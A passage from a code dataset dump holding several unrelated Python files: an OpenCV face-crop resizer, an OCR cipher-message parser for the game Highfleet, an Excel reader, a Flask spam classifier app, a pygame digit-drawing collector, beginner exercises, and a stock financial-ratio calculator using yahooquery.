(i_h - y_c)\n elif y_c - iw_h < 0:\n outy_c += iw_h - (y_c)\n\n return (outx_c, outy_c)\n\n\ndef detect_face_opencv_haar(face_cascade: cv2.CascadeClassifier, frame: numpy.ndarray,\n i_w: int, in_height=300):\n \"\"\"\n Take haar_cascade and frame (img), search faces in the frame, select face with\n size 'iw'\n :param face_cascade: haarCascade obj\n :param frame: image for face detecting\n :param i_w: out img size\n :param in_height: default height for template img for haarDetector algorithm\n :return: out img (cut to iw)\n \"\"\"\n\n iw_h = i_w >> 1 # half of img width\n\n frame_open_cv_haar = frame.copy()\n frame_height = frame_open_cv_haar.shape[0]\n frame_width = frame_open_cv_haar.shape[1]\n\n in_width = int((frame_width / frame_height) * in_height)\n\n frame_open_cv_haar_small = cv2.resize(frame_open_cv_haar, (in_width, in_height))\n\n faces = face_cascade.detectMultiScale(cv2.cvtColor(frame_open_cv_haar_small,\n cv2.COLOR_BGR2GRAY))\n\n # choose the first face, find center of rect\n if not list(faces): # if no face detected select the middle of the picture\n roi = get_roi(int(frame_width / 2), int(frame_height / 2), frame_width, frame_height, iw_h)\n out_small_image = frame_open_cv_haar[roi[1] - iw_h:roi[1] + iw_h - 1,\n roi[0] - iw_h:roi[0] + iw_h - 1].copy()\n else: # faces are detected, select one of them\n x_center = int((faces[0][0] + faces[0][2] / 2) * (frame_width / in_width))\n y_center = int((faces[0][1] + faces[0][3] / 2) * (frame_height / in_height))\n roi = get_roi(x_center, y_center, frame_width, frame_height, iw_h)\n out_small_image = frame_open_cv_haar[roi[1] - iw_h:roi[1] + iw_h - 1,\n roi[0] - iw_h:roi[0] + iw_h - 1].copy()\n\n # logger.debug(VisualRecord(\"Haar face detector \" + str(datetime.datetime.utcnow()),\n # [frame_open_cv_haar, out_small_image], \"bla bla\", fmt=\"png\"))\n\n return out_small_image\n\n\ndef resize_image_haar(cascade: cv2.CascadeClassifier, src_image: numpy.ndarray, p_w: int):\n \"\"\"doc\"\"\"\n out_small_image = detect_face_opencv_haar(cascade, src_image, p_w)\n return out_small_image\n\n\ndef open_im_resize_and_save(path_list: list, i_w: int):\n '''\n Imgs processing: open imgs with path in path_list, resize and save on disk\n :param path_list: string list with path imgs\n :param i_w: out image width\n :return: nothing. Result photos save on disk\n '''\n face_cascade = cv2.CascadeClassifier(\"haar\\\\haarcascade_frontalface_default.xml\")\n for path_f in path_list:\n src_im = cv2.imread(path_f)\n temp_img = numpy.zeros((i_w - 1, i_w - 1, 3), numpy.uint8) # empty image\n temp_img[:, :, 2] = 255 # red color temlate with size 256x256 pixels\n\n # for real photo apply haar face detector and resize photo by faces\n if not src_im.shape[0] == src_im.shape[1] & src_im.shape[0] == i_w - 1:\n temp_img = resize_image_haar(face_cascade, src_im, i_w)\n\n # save result photo\n c_dir, file = path_f.split('\\\\')\n cv2.imwrite(c_dir + \"\\\\\" + \"p\" + file, temp_img)\n\n print(\"List of \" + str(len(path_list)) + \" images saved. \" + \" PID = \" + str(os.getpid()))\n\n\ndef generate_list_of_paths(template_start, template_end, number_of_imgs):\n \"\"\"doc\"\"\"\n out_list = []\n for i in range(number_of_imgs):\n out_list.append(template_start + str(i) + template_end)\n return out_list\n\n\ndef main(num_i: int, i_w: int, collage_cols: int):\n \"\"\"\n Open photo in \"photo\" folder of proj dir.\n Compute and form lists of images for parallel image processing.\n Detect faces in the each image and cut them with size IM_WIDTH x IM_WIDTH\n Save small images with a new name in 'photo' dir.\n\n Sequence of funcs calls:\n - main() calls generate_list_of_paths() - create list with photo paths\n - main() calls openim_resize_and_save() in parallel mode;\n - openim_resize_and_save() processes each photo in list: open, resize and save\n - in the loop by list elements openim_resize_and_save() calls a\n resize_image_haar() that resize imgs\n - resize_image_haar() calls face detector detectFaceOpenCVHaar() that return\n cut photo with final size\n - detectFaceOpenCVHaar() calls get_roi() for checking and changing roi\n - get_roi() returns result roi for detectFaceOpenCVHaar()\n - detectFaceOpenCVHaar()returns result photo for resize_image_haar()\n - resize_image_haar() returns photo to openim_resize_and_save()\n - openim_resize_and_save() saves result photo on disk\n - main() calls collage_create module and finishes itself\n \"\"\"\n print(\"\\nStart detecting faces and resize images in parallel mode\")\n\n # of CPUs\n cpus = os.cpu_count()\n # generate a list of images paths\n pathes = generate_list_of_paths(\"photo\\\\i0000\", \".jpg\", num_i)\n\n photos_by_process = int(num_i / cpus)\n delim = num_i % cpus # idx starts from 0 but photo from 1 => d decremented by 1\n\n splitted_list = []\n\n for i in range(cpus):\n splitted_list.append(i)\n splitted_list[i] = []\n for j in range(photos_by_process):\n splitted_list[i].append(pathes[j + photos_by_process * i])\n\n # to last list add the last d paths\n for k in range(delim):\n splitted_list[i].append(pathes[k + photos_by_process * cpus])\n\n # form list from lists\n final_list = [i for i in splitted_list]\n #final_list.append(i) for i in range(len(splitted_list))\n #final_list.append(splitted_list[i])\n t_0 = timeit.time.time()\n\n # openim_resize_and_save(final_list[3])\n # START parallel execution of functions\n #open_im_resize_and_save(final_list[0], i_w)\n\n with Pool(processes=cpus) as pool:\n pool.starmap(open_im_resize_and_save, zip(final_list, repeat(i_w)))\n\n t_1 = timeit.time.time()\n print(\"execution time: {:.3f}\".format(t_1 - t_0) + \"s. (Only detecting faces and resize)\")\n\n collage_create.main(num_i, i_w, collage_cols)\n\nif __name__ == \"__main__\":\n # PERFOMANCE ESTIMATION\n # ~6 сек за цикл сохранения 50 фоток\n # 1 way. print(timeit.timeit(\"openim_resize_and_save()\", setup=\"from __main__ import\n # openim_resize_and_save\", number = 2))\n # 2 way. extime = float(timeit.Timer(openim_resize_and_save).timeit(number=3))/3\n # print(extime)\n main(10, 128, 5)\n","repo_name":"Nenu1985/Collage","sub_path":"collage/resize_images.py","file_name":"resize_images.py","file_ext":"py","file_size_in_byte":7433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"97"} +{"seq_id":"43286885453","text":"import csv\nfrom functools import lru_cache\nfrom operator import itemgetter\nimport string\nfrom typing import Optional\n\nimport pytesseract\nfrom PIL import Image, ImageGrab\n\nfrom src.globals import DO_STRETCH\n\n\nREPLACEMENT_WORD_CACHE = {}\n\n\nclass Message:\n def __init__(self, text: Optional[str] = None):\n self.ocred = not text\n self._text = text\n self._corrected_text: Optional[str] = None\n self._image: Optional[Image.Image] = None\n self._data: Optional[dict] = None\n self._raw_words: Optional[list[str]] = None\n self._raw_scores: Optional[list[float]] = None\n self._corrected_words: Optional[list[str]] = None\n self._words: Optional[tuple[str]] = None\n self._receiver: Optional[str] = None\n self._sender: Optional[str] = None\n self._body: Optional[list[str]] = None\n\n @property\n def image(self) -> Image:\n if not self.ocred:\n raise ValueError(\"Cannot get image of unocred message\")\n if not self._image:\n # a bounding box (bbox) is a 4-tuple defining the left, upper, right, and lower pixel coordinate.\n # At 1920x1200, the box would be (8, 981, 571, 1136) if not stretched\n # At 1920x1200 stretched, the box would at approximately (9, 1080, 634, 1195)\n # if the ratio is not 16:9, we need to stretch our crop box.\n full_screen = ImageGrab.grab(include_layered_windows=True)\n bbox = (78, 981, 571, 1136)\n if DO_STRETCH:\n bbox = (79, 1080, 634, 1195)\n # scale for width and height of the full_screen\n bbox = (\n int(bbox[0] * full_screen.width / 1920),\n int(bbox[1] * full_screen.height / 1200),\n int(bbox[2] * full_screen.width / 1920),\n int(bbox[3] * full_screen.height / 1200),\n )\n self._image = ImageGrab.grab(bbox=bbox, include_layered_windows=True)\n # convert to greyscale\n self._image = self._image.convert(\"L\")\n return self._image\n\n @property\n def text(self) -> str:\n if not self._text:\n assert self.ocred\n self._text = pytesseract.image_to_string(self.image)\n return self._text\n\n @property\n def data(self) -> dict:\n if not self.ocred:\n raise ValueError(\"Cannot get data of unocred message\")\n if not self._data:\n tsv_data = pytesseract.image_to_data(self.image)\n tsv_reader = csv.reader(tsv_data.splitlines(), delimiter=\"\\t\")\n headers = [x.lower() for x in next(tsv_reader)]\n assert headers == [\n \"level\",\n \"page_num\",\n \"block_num\",\n \"par_num\",\n \"line_num\",\n \"word_num\",\n \"left\",\n \"top\",\n \"width\",\n \"height\",\n \"conf\",\n \"text\",\n ]\n self._data = [dict(zip(headers, row)) for row in tsv_reader]\n return self._data\n\n @property\n def raw_words(self) -> list[str]:\n if not self._raw_words:\n if self.ocred:\n # todo: deal with low confidence words\n raw = list(filter(itemgetter(0), [(x[\"text\"].strip(), x[\"conf\"]) for x in self.data if x[\"text\"]]))\n self._raw_words = [x[0] for x in raw]\n self._raw_scores = [x[1] for x in raw]\n # remove low confidence words\n # for index, (score, word) in reversed(list(enumerate(zip(self._raw_scores, self._raw_words)))):\n # if float(score) < 50:\n # del self._raw_words[index]\n # del self._raw_scores[index]\n\n else:\n self._raw_words = list(filter(None, [x.strip() for x in self.text.split()]))\n assert all(self._raw_words)\n return self._raw_words\n\n @lru_cache\n def valid_word(self, word: str, allow_mixed=False) -> bool:\n indicators = word and (\n all(c in string.ascii_uppercase + \"-\" for c in word)\n or all(c in string.digits for c in word)\n or word.startswith(\"=\")\n or word.endswith(\"=\")\n or (allow_mixed and all(c in (string.ascii_uppercase + \"-\" + string.digits) for c in word))\n )\n contra_indicators = not word or word.startswith(\"-\") or word.endswith(\"-\")\n return not contra_indicators and indicators\n\n @property\n def corrected_words(self) -> list[str]:\n if not self._corrected_words:\n # pytesseract seems to figure out 0 and Os using context clues.\n # The \"1\"s and \"I\"s in highfleet's font confuse it. we need to replace 1 with I in words that are mostly characters and I with 1 in words that are mostly numbers\n self._corrected_words = []\n new_replacement_words = {}\n for word in self.raw_words:\n if word in REPLACEMENT_WORD_CACHE:\n if REPLACEMENT_WORD_CACHE[word] is None:\n self._corrected_words.append(\"\")\n continue\n self._corrected_words.append(REPLACEMENT_WORD_CACHE[word])\n continue\n elif word in new_replacement_words:\n if new_replacement_words[word] is None:\n self._corrected_words.append(\"\")\n continue\n self._corrected_words.append(new_replacement_words[word])\n continue\n elif self.valid_word(word):\n self._corrected_words.append(word)\n new_replacement_words[word] = word\n continue\n elif \"I\" in word:\n # if the non I characters are mostly numbers, replace I with 1\n number_count = sum(c.isdigit() for c in word.replace(\"I\", \"\"))\n if number_count > len(word) / 2:\n replaced = word.replace(\"I\", \"1\")\n self._corrected_words.append(replaced)\n new_replacement_words[word] = replaced\n continue\n if \"1\" in word:\n # if the non 1 characters are mostly letters, replace 1 with I\n letter_count = sum(c.isalpha() for c in word.replace(\"1\", \"\"))\n if letter_count > len(word) / 2:\n replaced = word.replace(\"1\", \"I\")\n self._corrected_words.append(replaced)\n new_replacement_words[word] = replaced\n continue\n # pound sings are sometimes 1s\n if \"£\" in word:\n replaced = word.replace(\"£\", \"1\")\n if self.valid_word(replaced):\n self._corrected_words.append(replaced)\n new_replacement_words[word] = replaced\n continue\n # fallthrough, the user can deal with this later\n self._corrected_words.append(word)\n for index, (new_word, old_word) in enumerate(zip(self._corrected_words, self._raw_words)):\n if new_word != old_word:\n self.update_text_by_index(self._text, self.raw_words, index, new_word)\n REPLACEMENT_WORD_CACHE.update(new_replacement_words)\n return self._corrected_words\n\n @staticmethod\n def update_text_by_index(text: str, words: list[str], new_word_index: int, new_word: str) -> str:\n # if new_word is duplicated in the list, we need to figure out which one we're replacing\n duplicate_indices = [index for index, word in enumerate(words) if word == new_word]\n # we are assuming the words list is in order of appearance in the text, at least for duplicates\n if len(duplicate_indices) > 1:\n # replace the duplicates with unique markers that are unlikely to be in the text\n for index in duplicate_indices:\n text = text.replace(words[index], f\"**{index}**\", 1)\n # replace the one we want\n text = text.replace(f\"**{new_word_index}**\", new_word, 1)\n # replace the rest of the duplicates\n for index in duplicate_indices:\n if index != new_word_index:\n text = text.replace(f\"**{index}**\", words[index], 1)\n else:\n text = text.replace(words[new_word_index], new_word, 1)\n return text\n\n @property\n def corrected_text(self) -> str:\n if not self._corrected_text:\n # _corrected_text is updated via update_corrected_word\n self._corrected_text = self._text\n return self._corrected_text\n\n def clear_words_after_corrected_words(self):\n self._words = None\n self._body = None\n self._receiver = None\n self._sender = None\n\n def update_corrected_word(self, index: int, new_word: str):\n self._corrected_text = self.update_text_by_index(self.corrected_text, self.corrected_words, index, new_word)\n self._corrected_words[index] = new_word\n self.clear_words_after_corrected_words()\n\n @property\n def words(self) -> tuple[str]:\n if not self._words:\n self._words = tuple(filter(None, [x for x in self.corrected_words if x]))\n assert all(self._words)\n return self._words\n\n @property\n def sender(self) -> Optional[str]:\n # the sender is the last word, prepended with a equals sign\n # the sender can be missing\n # return sans equals sign\n if not self._sender:\n self._sender = (\n self.words[-1].lstrip(\"=\") if self.words and self.words[-1].startswith(\"=\") else None\n ) or None\n return self._sender\n\n @property\n def receiver(self) -> Optional[str]:\n # the receiver is the first word appended with a equals sign\n # the receiver can be missing\n # return sans equals sign\n if not self._receiver:\n self._receiver = (self.words[0].rstrip(\"=\") if self.words and self.words[0].endswith(\"=\") else None) or None\n return self._receiver\n\n @property\n def body(self) -> list[str]:\n # the body is everything in between the sender and receiver\n if not self._body:\n self._body = self.words[1 if self.receiver else 0 : -1 if self.sender else None]\n return self._body\n\n def handle_replacement_word(self, word: str) -> str:\n replacement = None\n while True: # no do while in python\n print(f\"Please enter replacement for {word} or blank to skip\")\n replacement = input()\n replacement = replacement.strip().upper()\n if replacement == \"\":\n # leave loop with no replacement\n break\n if self.valid_word(replacement, allow_mixed=True):\n # leave loop with replacement\n break\n return replacement\n\n def get_word_translations(self, translation_table: dict[int, str]) -> str:\n # get all the words in order, translate them and update the text to return\n cipher_words = [self.receiver] + list(self.body) + [self.sender]\n clear_words = [str.translate(word, translation_table) for word in cipher_words]\n return dict(zip(cipher_words, clear_words))\n\n def get_clear_text(self, translation_table: dict[int, str]) -> str:\n cipher_words_to_clear_words = self.get_word_translations(translation_table)\n clear_text = self.corrected_text\n for key, value in cipher_words_to_clear_words.items():\n clear_text = clear_text.replace(key, value, 1)\n return clear_text\n","repo_name":"jhillacre/highfleet-decoder","sub_path":"src/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":11826,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"97"} +{"seq_id":"34720634250","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nimport xlrd\n\ndf=pd.read_excel(\"D:\\Pics\\抖音采集工具x64\\视频列表0301-1734.xlsx\")\ndf.head(10)\n# fig=plt.figure()\n#\n# ax=fig.add_subpolt(1,1,1)\n\ndata=xlrd.open_workbook(filename=r\"D:\\Pics\\抖音采集工具x64\\视频列表0301-1734.xlsx\")\n# table=data.sheets()[8]\ntable=data.sheet_by_name('作者作品')\nnames=data.sheet_names()\nprint(names)\nprint(table)\nprint(\"xlsx行数:\",table.nrows)\n# print(data.sheet_loaded('61'))\n# print(table.row_len(2))\n# print(table.row(3))\n# print(table.row_types(3,start_colx=0,end_colx=None))\n# print(table.row_values(3,start_colx=0,end_colx=None))\n\n# print(table.ncols)\n# print(table.col(1,start_rowx=0,end_rowx=15))\n# print(table.col_values(1,start_rowx=0,end_rowx=15))\n# print(table.col_types(1,start_rowx=0,end_rowx=15))\n\n# print(table.cell(1,6))\n# print(table.cell_value(1,6))\n# print(table.col_types(1,6))\n# ax.hist(df['点赞数'],bins=7)\n# # labels and Tit\n# plt.title('大小比较')\n# plt.xlabel('time')\n# plt.ylabel('点赞数')\n# plt.show()","repo_name":"yinqinghe/spider-crawler","sub_path":"课外学习/微博图片/数据可视化/数据读入.py","file_name":"数据读入.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"97"} +{"seq_id":"14924561061","text":"from flask import Flask, render_template, request\n\nfrom src.spamDetection.pipelines.predict_pipeline import CustomData, PredictPipeline\nfrom src.spamDetection.logger import logging\n\napp = Flask(__name__)\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef predict_datapoint():\n if request.method == 'GET':\n return render_template('home.html')\n\n else:\n data = CustomData(text_input=request.form.get('email-text'))\n\n print(\"Creating custom Data as DataFrame\")\n data_df = data.get_data_as_dataframe()\n print(\"Generating predictions...\")\n predict_pipeline = PredictPipeline()\n preds = predict_pipeline.predict(data_df).numpy()\n class_dict = {0: \"Not Spam\", 1: \"Spam\"}\n return render_template('home.html', results=class_dict[int(round(preds[0][0]))])\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=8080)\n","repo_name":"amulyaprasanth/email_spam_detection_CVIP_Data_Science_Intern","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"97"} +{"seq_id":"11386108241","text":"musterAdi='Mehmet'\nmusterSoyad='Dizman'\nmusteriAdSoyad= musterAdi + ' ' + musterSoyad\nmusteriCinsiyet=True #Erkek\nmusteriTcNo='12345678900'\nmusteriDogumYili=2000\nmusteriAdres='Konya'\nmusteriYasi=2022-musteriDogumYili\n\norder1=110\norder2=2222\norder3=546\ntotal=order1+order2+order3\nprint(total)","repo_name":"mdizman/PythonCourse","sub_path":"Objeler ve Veri Yapıları/1-DegiskenTanimlama.py","file_name":"1-DegiskenTanimlama.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"97"} +{"seq_id":"71738072319","text":"import pygame\nimport os\nfrom PIL import ImageGrab # Use for Windows\n#import pyscreenshot as ImageGrab # Use for Linux\nimport datetime\nimport os\n\npygame.init()\n\n\nx = 100\ny = 100\nSCREENWIDTH = 300\nSCREENHEIGHT = 300\n\nos.environ['SDL_VIDEO_WINDOW_POS'] = \"%d,%d\" % (x,y)\n\n#capture_window = (x+5,y+25,x+SCREENWIDTH+5,y+SCREENHEIGHT+25) Use for Linux\ncapture_window = (x,y,x+SCREENWIDTH,y+SCREENHEIGHT) # use for Windows\n\nBLACK = (0,0,0)\nWHITE = (255,255,255)\nLIME = (0,255,0)\nBLUE = (0,0,255)\n\ndef get_filename():\n now = str(datetime.datetime.now())\n now = now.replace(\" \",\"\")\n now = now.replace(\":\",\"\")\n now = now.replace(\"-\",\"\")\n now = now.replace(\".\",\"\")\n now+=\".png\"\n return now\n\nget_filename()\n\nclass Brush(pygame.sprite.Sprite):\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\tself.image = pygame.Surface((30,30))\n\t\tself.image.fill(LIME)\n\t\tself.image.set_colorkey(LIME)\n\t\tself.rect = self.image.get_rect()\n\t\tself.can_draw = False\n\t\tself.x = 0\n\t\tself.y = 0\n\t\tself.color = BLACK\n\n\tdef update(self):\n\t\tif not self.can_draw:\n\t\t\tpygame.mouse.set_visible(True)\n\n\t\tif (self.can_draw):\n\t\t\tpygame.mouse.set_visible(False)\n\t\t\tpygame.draw.circle(self.image,self.color,(self.rect.centerx,self.rect.centery),15)\n\t\t\tself.rect.x,self.rect.y = pygame.mouse.get_pos()\n\n\nscreen = pygame.display.set_mode((SCREENWIDTH,SCREENHEIGHT+35))\nscreen.fill(WHITE)\ninstruction_font = pygame.font.Font('freesansbold.ttf', 15)\n\nbrush_group = pygame.sprite.Group()\n\nbrush = Brush()\n\nbrush_group.add(brush)\n\nrunning = True\n\nwhile running:\n\tfor event in pygame.event.get():\n\t\tif event.type == pygame.QUIT:\n\t\t\trunning = False\n\t\tif event.type == pygame.MOUSEBUTTONDOWN:\n\t\t\tbrush.can_draw = True\n\t\tif event.type == pygame.MOUSEBUTTONUP:\n\t\t\tbrush.can_draw = False\n\t\tif event.type == pygame.KEYDOWN:\n\t\t\tif event.key == pygame.K_r:\n\t\t\t\tbrush.rect.x,brush.rect.y = -50,0\n\t\t\t\tscreen.fill(WHITE)\n\t\t\tif event.key == pygame.K_s:\n\t\t\t\timage = ImageGrab.grab(capture_window)\n\t\t\t\timage.save(os.path.join(\"\",get_filename()))\n\t\t\t\tbrush.rect.x,brush.rect.y = -50,0\n\t\t\t\tscreen.fill(WHITE)\n\tbrush_group.draw(screen)\n\tbrush_group.update()\n\tpygame.draw.rect(screen,(BLACK),(0,SCREENHEIGHT,300,35))\n\tinstruction = instruction_font.render(\"Press [S] to save and [R] to refresh\", True, (0,255,0), (0,0,0))\n\tscreen.blit(instruction,(20,SCREENHEIGHT+10))\n\tpygame.display.flip()\nquit()\n\n","repo_name":"leslie-asava/Hand-Written-Digit-Recognition","sub_path":"collect_data.py","file_name":"collect_data.py","file_ext":"py","file_size_in_byte":2344,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"97"} +{"seq_id":"20641273736","text":"mydic={'name':'小明','age':18,'sex':'男'}\n#获取name的值\nname=mydic['name']\n#添加新的键值对\nmydic['mail']='xiaoming@163.com'\n#修改值\nmydic['name']='小华'\n#删除值\ndel mydic['mail']\nprint(mydic)\n#遍历所有的键值对\nfor k,v in mydic.items():\n print('k:'+str(k)+'\\t v:'+str(v))\n#遍历所有的键\nfor k in mydic.keys():\n print(k)\n#遍历字典时,默认会遍历所有的键,上述语句等同于该语句\nfor k in mydic:\n print(k)\n#排序遍历\nfor k in sorted(mydic):\n print(k)\n#遍历所有值\nfor v in mydic.values():\n print(v)\n#set()去重\ndic={'name1':'小明','name2':'小明','name3':'小华'}\nprint(set(dic.values()))\nfor v in set(dic.values()):\n print(v)\n\n#字典列表\ndic1={'name':'小明','age':18,'sex':'男'}\ndic2={'name':'小芳','age':15,'sex':'女'}\ndic3={'name':'小米','age':25,'sex':'男'}\ndiclist=[dic1,dic2,dic3]\nprint(diclist)\nfor dic in diclist:\n print(dic)\n\n#字典中存储列表 \ndic= {\n 'name':'编程语言',\n 'type':['python','c#','java']\n }\nfor t in dic['type']:\n print(t)\n\n#字典中存储字典\nmydic={\n 'student':{\n 'stuname':'小明','stuage':18\n },\n 'class':{\n 'classname':'一班','teacher':'陈老师'\n }\n }\nfor k,v in mydic.items():\n for lk ,lv in v.items():\n print(lk+'\\t'+str(lv))\n ","repo_name":"AngYony/ay-treasure-tool","sub_path":"python/book-src/crmdsj/Dictionary/dictionary_sample.py","file_name":"dictionary_sample.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"97"} +{"seq_id":"7660458236","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon May 8 03:58:30 2023\r\n\r\n@author: woa8uh\r\n\"\"\"\r\n\r\nfrom yahooquery import Ticker\r\nimport pandas as pd\r\nimport datetime\r\nimport glob\r\nimport os.path\r\n\r\nstocks_file_type = 'equity_active_data_*'\r\nstocks_files = glob.glob(stocks_file_type)\r\nstocks_max_file = max(stocks_files, key=os.path.getctime)\r\ndf_all_bse_stocks = pd.read_csv(stocks_max_file)\r\nstock_tickers = df_all_bse_stocks['scrip_id'] + \".BO\"\r\n\r\n# Create a new DataFrame to store the calculated ratios\r\nratios_df = pd.DataFrame(columns=[\r\n \"Symbol\", \"Current Ratio\", \"Quick Ratio\", \"Gross Profit Margin\", \"Operating Profit Margin\",\r\n \"Net Profit Margin\", \"Inventory Turnover\", \"Receivables Turnover\", \"Debt to Equity Ratio\",\r\n \"Debt Ratio\", \"Interest Coverage Ratio\", \"Return on Assets\", \"Return on Equity\",\r\n \"Return on Investments\", \"Earnings per Share\", \"Revenue Growth Rate\",\r\n \"Earnings Growth Rate\", \"P/E Ratio\", \"Dividend Yield\"\r\n])\r\nfor symbol in stock_tickers:\r\n print(symbol)\r\n stock = Ticker(symbol, country = 'India')\r\n \r\n #Perform quaterly financial fundamental analysis\r\n quaterly = stock.all_financial_data(frequency=\"q\")\r\n if('data unavailable' not in quaterly):\r\n quaters = quaterly[quaterly['TotalAssets'].notna()]\r\n recent_quater = quaters.iloc[-1] \r\n \r\n #Liquidity Ratios\r\n try:\r\n current_assets = recent_quater['CurrentAssets']\r\n except:\r\n current_assets = None\r\n try: \r\n current_liabilities = recent_quater['CurrentLiabilities']\r\n except:\r\n current_liabilities = None\r\n try: \r\n inventory = recent_quater['Inventory']\r\n except:\r\n inventory = None\r\n \r\n try: \r\n current_ratio = current_assets / current_liabilities\r\n except:\r\n current_ratio = None\r\n try: \r\n quick_ratio = (current_assets - inventory) / current_liabilities \r\n except:\r\n quick_ratio = None\r\n \r\n #Profitability Ratios\r\n try: \r\n gross_profit = recent_quater['GrossProfit']\r\n except:\r\n gross_profit = None\r\n try: \r\n revenue = recent_quater['TotalRevenue']\r\n except:\r\n revenue = None\r\n try: \r\n operating_income = recent_quater['OperatingIncome']\r\n except:\r\n operating_income = None\r\n try: \r\n net_income = recent_quater['NetIncome']\r\n except:\r\n net_income = None\r\n \r\n try: \r\n gross_profit_margin = (gross_profit / revenue) * 100\r\n except:\r\n gross_profit_margin = None\r\n try: \r\n operating_profit_margin = (operating_income / revenue) * 100\r\n except:\r\n operating_profit_margin = None\r\n try: \r\n net_profit_margin = (net_income / revenue) * 100\r\n except:\r\n net_profit_margin = None\r\n \r\n #Efficiency Ratios\r\n try: \r\n cogs = recent_quater['CostOfRevenue']\r\n except:\r\n cogs = None\r\n try: \r\n inventory_values = quaters.Inventory\r\n average_inventory = sum(inventory_values) / len(inventory_values)\r\n except:\r\n average_inventory = None\r\n try: \r\n accounts_recievable_values = quaters.AccountsReceivable\r\n average_accounts_recievable = sum(accounts_recievable_values) / len(accounts_recievable_values)\r\n except:\r\n average_accounts_recievable = None\r\n \r\n try: \r\n inventory_turnover = cogs / average_inventory\r\n except:\r\n inventory_turnover = None\r\n try: \r\n receivables_turnover = revenue / average_accounts_recievable \r\n except:\r\n receivables_turnover = None\r\n else:\r\n current_ratio = None\r\n quick_ratio = None\r\n gross_profit_margin = None\r\n operating_profit_margin = None\r\n net_profit_margin = None\r\n inventory_turnover = None\r\n receivables_turnover = None\r\n \r\n #Perform annualy financial fundamental \r\n annually = stock.all_financial_data(frequency=\"a\")\r\n if('data unavailable' not in annually): \r\n years = annually[annually['TotalAssets'].notna()]\r\n recent_year = annually.iloc[-1] \r\n if(len(years) > 1):\r\n prev_year = annually.iloc[-2]\r\n else:\r\n prev_year = annually.iloc[-1]\r\n #Solvency Ratios\r\n try: \r\n total_debt = recent_year['TotalDebt']\r\n except:\r\n total_debt = None\r\n try: \r\n total_equity = recent_year['StockholdersEquity']\r\n except:\r\n total_equity = None\r\n try: \r\n total_assets = recent_year['TotalAssets']\r\n except:\r\n total_assets = None\r\n try: \r\n ebit = recent_year['EBIT']\r\n except:\r\n ebit = None\r\n try: \r\n interest_expense = recent_year['InterestExpense']\r\n except:\r\n interest_expense = None\r\n \r\n try: \r\n debt_to_equity_ratio = total_debt / total_equity \r\n except:\r\n debt_to_equity_ratio = None\r\n try: \r\n debt_ratio = total_debt / total_assets\r\n except:\r\n debt_ratio = None\r\n try: \r\n interest_coverage_ratio = ebit / interest_expense\r\n except:\r\n interest_coverage_ratio = None\r\n \r\n #Return Ratios\r\n try: \r\n net_income = recent_year['NetIncome']\r\n except:\r\n net_income = None\r\n try: \r\n average_total_assets = (recent_year['TotalAssets'] + prev_year['TotalAssets']) / 2\r\n except:\r\n average_total_assets = None\r\n try: \r\n average_total_equity = (recent_year['StockholdersEquity'] + prev_year['StockholdersEquity']) / 2\r\n except:\r\n average_total_equity = None\r\n try: \r\n total_investments_recent_year = recent_year['AvailableForSaleSecurities'] + recent_year['CashEquivalents'] + recent_year['CashFinancial'] + recent_year['HeldToMaturitySecurities'] + recent_year['InvestmentinFinancialAssets'] + recent_year['OtherShortTermInvestments']\r\n total_investments_prev_year = prev_year['AvailableForSaleSecurities'] + prev_year['CashEquivalents'] + prev_year['CashFinancial'] + prev_year['HeldToMaturitySecurities'] + prev_year['InvestmentinFinancialAssets'] + prev_year['OtherShortTermInvestments']\r\n average_total_investment = (total_investments_recent_year + total_investments_prev_year) / 2\r\n except:\r\n average_total_investment = None\r\n \r\n try: \r\n roa = net_income / average_total_assets\r\n except:\r\n roa = None\r\n try: \r\n roe = net_income / average_total_equity\r\n except:\r\n roe = None\r\n try: \r\n roi = net_income / average_total_investment\r\n except:\r\n roi = None\r\n \r\n #EPS\r\n try: \r\n eps = recent_year['BasicEPS']\r\n except:\r\n eps = None\r\n #Growth Rates\r\n try: \r\n revenue_growth_rate = (recent_year['TotalRevenue'] - prev_year['TotalRevenue']) / prev_year['TotalRevenue']\r\n except:\r\n revenue_growth_rate = None\r\n try: \r\n earnings_growth_rate = (net_income - prev_year['NetIncome']) / prev_year['NetIncome']\r\n except:\r\n earnings_growth_rate = None\r\n try: \r\n pe_ratio = stock.quotes[symbol]['trailingPE']\r\n except:\r\n pe_ratio = None\r\n try: \r\n dividend_yield = stock.quotes[symbol]['trailingAnnualDividendYield']\r\n except:\r\n dividend_yield = None \r\n else:\r\n debt_to_equity_ratio = None\r\n debt_ratio = None\r\n interest_coverage_ratio = None\r\n roa = None\r\n roe = None\r\n roi = None\r\n eps = None\r\n revenue_growth_rate = None\r\n earnings_growth_rate = None\r\n pe_ratio = None\r\n dividend_yield = None\r\n \r\n # Add the calculated ratios to the DataFrame\r\n ratios_df = ratios_df.append({\r\n \"Symbol\": symbol,\r\n \"Current Ratio\": current_ratio,\r\n \"Quick Ratio\": quick_ratio,\r\n \"Gross Profit Margin\": gross_profit_margin,\r\n \"Operating Profit Margin\": operating_profit_margin,\r\n \"Net Profit Margin\": net_profit_margin,\r\n \"Inventory Turnover\": inventory_turnover,\r\n \"Receivables Turnover\": receivables_turnover,\r\n \"Debt to Equity Ratio\": debt_to_equity_ratio,\r\n \"Debt Ratio\": debt_ratio,\r\n \"Interest Coverage Ratio\": interest_coverage_ratio,\r\n \"Return on Assets\": roa,\r\n \"Return on Equity\": roe,\r\n \"Return on Investments\": roi,\r\n \"Earnings per Share\": eps,\r\n \"Revenue Growth Rate\": revenue_growth_rate,\r\n \"Earnings Growth 